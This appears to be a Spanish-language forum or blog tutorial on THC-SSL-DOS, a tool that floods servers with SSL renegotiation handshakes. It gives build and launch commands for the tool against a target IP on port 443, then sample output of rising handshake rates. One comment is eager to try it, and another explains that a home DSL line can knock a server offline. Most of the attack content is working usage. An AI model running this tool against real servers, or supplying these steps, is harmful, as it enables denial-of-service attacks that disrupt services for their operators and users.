_____________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
THC-SSL-DOS es una herramienta para comprobar el rendimiento de SSL. THC-SSL-DOS explota esta característica asimétrica sobrecargando el servidor y lo derriba de Internet. Este problema afecta a todas las implementaciones de SSL en la actualidad. Los vendedores son conscientes de este problema desde el año 2003 y el tema ha sido discutido ampliamente.
Uso : cd Desktop
cd thc-ssl-dos-1.4
cd src
configure
make install
Ej: 443/tcp open ssl/http Apache httpd
./thc-ssl-dos 127.3.133.7 443 --accept
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
(http://1.bp.blogspot.com/-1Bv36hJQzhQ/UU4ggS7y3zI/AAAAAAAAAdo/pXpS8vvIUoY/s400/Pantallazo-4.png)
(http://3.bp.blogspot.com/-G1sKc6u9sYs/UU4ZSlWuabI/AAAAAAAAAdY/ZbwDmrraETc/s400/Pantallazo.png)
(http://2.bp.blogspot.com/-yNXRsIuSNJ0/UU4ZSOQUfJI/AAAAAAAAAdQ/3BD4ZIRAt5Y/s400/Pantallazo-1.png)
genial tuto, lo pongo en marcha ya, saludos
Con THC-SSL nos podemos percatar como pasa a segundo plano, los ataques Dos comunes, que eran un flood de paquetes TCP/UDP , requiriendo una gran cantidad de banda ancha para poder realmente dejar offline un servidor, en cuanto a los handshake que realiza cada paguina que implemente certificados SSL, requieren un consumo de CPU mucho mayor que cualquiera con una conexion DSL puede llegar dejar Offline un servidor, provocando una mayor cifra de 300 ssl handshakes , muy interesante esta debilidad de manipular SSL por parte de los servidores.